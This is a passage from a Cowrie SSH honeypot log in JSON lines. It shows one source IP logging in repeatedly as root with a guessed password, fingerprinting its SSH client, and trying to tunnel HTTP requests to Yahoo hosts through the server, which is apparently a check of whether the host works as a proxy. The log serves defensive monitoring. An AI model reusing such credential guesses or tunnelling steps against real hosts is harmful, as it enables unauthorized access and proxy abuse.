"hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.951028Z","src_ip":"213.209.150.239","session":"48887f1fdc6d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:09.235104Z","src_ip":"213.209.150.239","session":"48887f1fdc6d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":31424,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:31424","sensor":"my-vps","timestamp":"2025-08-26T01:03:09.292937Z","session":"48887f1fdc6d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:09.350120Z","src_ip":"213.209.150.239","session":"48887f1fdc6d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":4762,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4762","sensor":"my-vps","timestamp":"2025-08-26T01:03:09.507051Z","session":"48887f1fdc6d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:09.563915Z","src_ip":"213.209.150.239","session":"48887f1fdc6d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:09.621957Z","src_ip":"213.209.150.239","session":"48887f1fdc6d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25847,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba5025af755e","protocol":"ssh","message":"New connection: 213.209.150.239:25847 (1.2.3.4:22) [session: ba5025af755e]","sensor":"my-vps","timestamp":"2025-08-26T01:03:09.668032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:09.668682Z","src_ip":"213.209.150.239","session":"ba5025af755e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:09.715886Z","src_ip":"213.209.150.239","session":"ba5025af755e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:09.950900Z","src_ip":"213.209.150.239","session":"ba5025af755e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":15632,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15632","sensor":"my-vps","timestamp":"2025-08-26T01:03:09.999159Z","session":"ba5025af755e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.046368Z","src_ip":"213.209.150.239","session":"ba5025af755e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":8691,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:8691","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.181550Z","session":"ba5025af755e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.228629Z","src_ip":"213.209.150.239","session":"ba5025af755e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.276549Z","src_ip":"213.209.150.239","session":"ba5025af755e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25891,"dst_ip":"1.2.3.4","dst_port":22,"session":"f67343e628bb","protocol":"ssh","message":"New connection: 213.209.150.239:25891 (1.2.3.4:22) [session: f67343e628bb]","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.322904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.333059Z","src_ip":"213.209.150.239","session":"f67343e628bb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.370651Z","src_ip":"213.209.150.239","session":"f67343e628bb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.605639Z","src_ip":"213.209.150.239","session":"f67343e628bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":25267,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25267","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.654411Z","session":"f67343e628bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.701685Z","src_ip":"213.209.150.239","session":"f67343e628bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":24882,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:24882","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.845610Z","session":"f67343e628bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.892939Z","src_ip":"213.209.150.239","session":"f67343e628bb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.940899Z","src_ip":"213.209.150.239","session":"f67343e628bb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25938,"dst_ip":"1.2.3.4","dst_port":22,"session":"39c438c9504c","protocol":"ssh","message":"New connection: 213.209.150.239:25938 (1.2.3.4:22) [session: 39c438c9504c]","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.996693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:10.997326Z","src_ip":"213.209.150.239","session":"39c438c9504c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:11.054011Z","src_ip":"213.209.150.239","session":"39c438c9504c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:11.337238Z","src_ip":"213.209.150.239","session":"39c438c9504c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":2501,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:2501","sensor":"my-vps","timestamp":"2025-08-26T01:03:11.395034Z","session":"39c438c9504c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:11.451831Z","src_ip":"213.209.150.239","session":"39c438c9504c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":8845,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:8845","sensor":"my-vps","timestamp":"2025-08-26T01:03:11.607202Z","session":"39c438c9504c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:11.664057Z","src_ip":"213.209.150.239","session":"39c438c9504c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:11.721860Z","src_ip":"213.209.150.239","session":"39c438c9504c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25998,"dst_ip":"1.2.3.4","dst_port":22,"session":"a18ce3e6ebf6","protocol":"ssh","message":"New connection: 213.209.150.239:25998 (1.2.3.4:22) [session: a18ce3e6ebf6]","sensor":"my-vps","timestamp":"2025-08-26T01:03:11.777426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:11.786421Z","src_ip":"213.209.150.239","session":"a18ce3e6ebf6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:11.835086Z","src_ip":"213.209.150.239","session":"a18ce3e6ebf6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:12.118120Z","src_ip":"213.209.150.239","session":"a18ce3e6ebf6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":29268,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29268","sensor":"my-vps","timestamp":"2025-08-26T01:03:12.175927Z","session":"a18ce3e6ebf6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:12.232563Z","src_ip":"213.209.150.239","session":"a18ce3e6ebf6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":25482,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25482","sensor":"my-vps","timestamp":"2025-08-26T01:03:12.387100Z","session":"a18ce3e6ebf6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:12.444017Z","src_ip":"213.209.150.239","session":"a18ce3e6ebf6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:12.502126Z","src_ip":"213.209.150.239","session":"a18ce3e6ebf6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":26051,"dst_ip":"1.2.3.4","dst_port":22,"session":"b912714e976d","protocol":"ssh","message":"New connection: 213.209.150.239:26051 (1.2.3.4:22) [session: b912714e976d]","sensor":"my-vps","timestamp":"2025-08-26T01:03:12.557904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:12.558583Z","src_ip":"213.209.150.239","session":"b912714e976d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:12.615461Z","src_ip":"213.209.150.239","session":"b912714e976d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:12.898228Z","src_ip":"213.209.150.239","session":"b912714e976d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":11305,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:11305","sensor":"my-vps","timestamp":"2025-08-26T01:03:12.956241Z","session":"b912714e976d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:13.013045Z","src_ip":"213.209.150.239","session":"b912714e976d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":2416,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2416","sensor":"my-vps","timestamp":"2025-08-26T01:03:13.171205Z","session":"b912714e976d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:13.228207Z","src_ip":"213.209.150.239","session":"b912714e976d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:13.285846Z","src_ip":"213.209.150.239","session":"b912714e976d"}
